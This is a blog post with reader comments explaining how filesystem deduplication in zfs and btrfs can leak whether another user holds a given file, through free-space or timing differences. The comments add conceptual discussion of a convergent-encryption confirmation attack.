Filesystem deduplication is a sidechannel
Jul. 27th, 2020 12:25 pm![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png)
First off - nothing I'm going to talk about in this post is novel or overly surprising, I just haven't found a clear writeup of it before. I'm not criticising any design decisions or claiming this is an important issue, just raising something that people might otherwise be unaware of.
With that out of the way: Automatic deduplication of data is a feature of modern filesystems like zfs and btrfs. It takes two forms - inline, where the filesystem detects that data being written to disk is identical to data that already exists on disk and simply references the existing copy rather than, and offline, where tooling retroactively identifies duplicated data and removes the duplicate copies (zfs supports inline deduplication, btrfs only currently supports offline). In a world where disks end up with multiple copies of cloud or container images, deduplication can free up significant amounts of disk space.
What's the security implication? The problem is that deduplication doesn't recognise ownership - if two users have copies of the same file, only one copy of the file will be stored[1]. So, if user a stores a file, the amount of free space will decrease. If user b stores another copy of the same file, the amount of free space will remain the same. If user b is able to check how much free space is available, user b can determine whether the file already exists.
This doesn't seem like a huge deal in most cases, but it is a violation of expected behaviour (if user b doesn't have permission to read user a's files, user b shouldn't be able to determine whether user a has a specific file). But we can come up with some convoluted cases where it becomes more relevant, such as law enforcement gaining unprivileged access to a system and then being able to demonstrate that a specific file already exists on that system. Perhaps more interestingly, it's been demonstrated that free space isn't the only sidechannel exposed by deduplication - deduplication has an impact on access timing, and can be used to infer the existence of data across virtual machine boundaries.
As I said, this is almost certainly not something that matters in most real world scenarios. But with so much discussion of CPU sidechannels over the past couple of years, it's interesting to think about what other features also end up leaking information in ways that may not be obvious.
(Edit to add: deduplication isn't enabled on zfs by default and is explicitly triggered on btrfs, so unless it's something you've enabled then this isn't something that affects you)
[1] Deduplication is usually done at the block level rather than the file level, but given zfs's support for variable sized blocks, identical files should be deduplicated even if they're smaller than the maximum record size
With that out of the way: Automatic deduplication of data is a feature of modern filesystems like zfs and btrfs. It takes two forms - inline, where the filesystem detects that data being written to disk is identical to data that already exists on disk and simply references the existing copy rather than, and offline, where tooling retroactively identifies duplicated data and removes the duplicate copies (zfs supports inline deduplication, btrfs only currently supports offline). In a world where disks end up with multiple copies of cloud or container images, deduplication can free up significant amounts of disk space.
What's the security implication? The problem is that deduplication doesn't recognise ownership - if two users have copies of the same file, only one copy of the file will be stored[1]. So, if user a stores a file, the amount of free space will decrease. If user b stores another copy of the same file, the amount of free space will remain the same. If user b is able to check how much free space is available, user b can determine whether the file already exists.
This doesn't seem like a huge deal in most cases, but it is a violation of expected behaviour (if user b doesn't have permission to read user a's files, user b shouldn't be able to determine whether user a has a specific file). But we can come up with some convoluted cases where it becomes more relevant, such as law enforcement gaining unprivileged access to a system and then being able to demonstrate that a specific file already exists on that system. Perhaps more interestingly, it's been demonstrated that free space isn't the only sidechannel exposed by deduplication - deduplication has an impact on access timing, and can be used to infer the existence of data across virtual machine boundaries.
As I said, this is almost certainly not something that matters in most real world scenarios. But with so much discussion of CPU sidechannels over the past couple of years, it's interesting to think about what other features also end up leaking information in ways that may not be obvious.
(Edit to add: deduplication isn't enabled on zfs by default and is explicitly triggered on btrfs, so unless it's something you've enabled then this isn't something that affects you)
[1] Deduplication is usually done at the block level rather than the file level, but given zfs's support for variable sized blocks, identical files should be deduplicated even if they're smaller than the maximum record size
Tahoe LAFS information confirmation attack
Date: 2020-07-28 01:31 am (UTC)This came up in Tahoe's use of convergent encryption which allows you do confirm some missing information. For example, if you know someone has a PDF template of a form which you know everything about except an SSN field, you can generate forms with all the SSNs and look for collisions, thereby confirming their SSN.
In this case, you could perform the same attack but look for dedups.
Re: Tahoe LAFS information confirmation attack
Date: 2020-08-16 04:25 am (UTC)So, using your example, if the SSN is in the last few bytes of a PDF containing a couple of big images that make it large enough to span multiple de-duplication blocks, you can infer it's existence by detecting the de-duplication of the first block of the PDF.
no subject
Date: 2020-07-28 10:30 am (UTC)no subject
Date: 2020-07-28 06:21 pm (UTC)no subject
Date: 2020-07-29 03:25 pm (UTC)- kousu
side?
Date: 2020-07-30 03:24 am (UTC)Re: side?
Date: 2020-08-02 11:48 pm (UTC)So while an admin needs to be aware of this, it's a conscious choice to link two files and expose this information, at least on the Linux filesystems being discussed.
Re: side?
Date: 2020-08-02 11:57 pm (UTC)Google already notifies law enforcement automatically
Date: 2020-07-31 01:33 am (UTC)They already have so much unfettered access to a persons data through automatic reports, backdoors, and if the government chooses to go that route, a plain old subpoena.
A file system quirk that might hint that something is there if you already have access to the file system is a strange concern at that point.